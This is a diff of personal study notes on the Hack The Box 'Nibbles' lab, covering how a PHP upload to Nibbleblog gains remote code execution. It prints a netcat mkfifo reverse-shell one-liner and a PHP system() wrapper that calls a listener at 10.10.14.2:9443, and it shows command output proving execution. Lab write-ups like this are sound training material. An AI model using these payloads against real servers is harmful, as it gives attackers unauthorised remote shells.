secmancer/sec-notes-repo/Hack The Box/HTB Academy/Skill Paths/Cracking into HTB/Getting Started/Attacking your First Box/Nibbles - Initial Foothold.md

 Warning: imagedestroy() expects parameter 1 to be resource, boolean given in /var/www/html/nibbleblog/admin/kernel/helpers/resize.class.php on line 80
 ```
-- Now we have to find out where the file uploaded if it was successful.
-Going back to the directory brute-forcing results, we remember the `/content` directory.
-Under this, there is a `plugins` directory and another subdirectory for `my_image`.
-- The full path is at `http://<host>/nibbleblog/content/private/plugins/my_image/`.
+- The uploaded file is found under `/nibbleblog/content/private/plugins/my_image/`.
-- In this directory, we see two files, `db.xml` and `image.php`, with a recent last modified date, meaning that our upload was successful!
-Let us check and see if we have command execution.
+- We see `db.xml` and `image.php` with a recent last modified date, indicating successful upload.
+- Now, we need to check to see if we have command execution on these files.
 ```shell-session
 secmancer@htb[/htb]$ curl http://10.129.42.190/nibbleblog/content/private/plugins/my_image/image.php

 uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
 ```
+- We sure in fact do!
-- We do!
-It looks like we have gained remote code execution on the web server, and the Apache server is running in the `nibbler` user context.
-Let us modify our PHP file to obtain a reverse shell and start poking around the server.
+- Looks like we gained remote code execution on the Apache server running as `nibbler` user.
-- Let us edit our local PHP file and upload it again.
-This command should get us a reverse shell.
-As mentioned earlier in the Module, there are many reverse shell cheat sheets out there.
-Some great ones are [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) and [HighOn,Coffee](https://highon.coffee/blog/reverse-shell-cheat-sheet/).
+- We can modify the PHP file to obtain a reverse shell and upload it again.
+- So, we can use resources like PayloadAllTheThings and HighOnCoffee for reverse shell techniques.
-- Let us use the following `Bash` reverse shell one-liner and add it to our `PHP` script.
+- Looks like aa Bash reverse shell one-liner will work best, so let's add that to the PHP script.
 ```shell-session
 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKING IP> <LISTENING PORT) >/tmp/f
 ```
-- We will add our `tun0` VPN IP address in the `<ATTACKING IP>` placeholder and a port of our choice for `<LISTENING PORT>` to catch the reverse shell on our `netcat` listener.
-See the edited `PHP` script below.
+- We will add our `tun0` VPN IP address in the `<ATTACKING IP>` placeholder.
+- Let's also add a port of our choice for `<LISTENING PORT>`.
+- This way, we can catch the reverse shell on our `netcat` listener.
 ```php
 <?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 9443 >/tmp/f"); ?>
 ```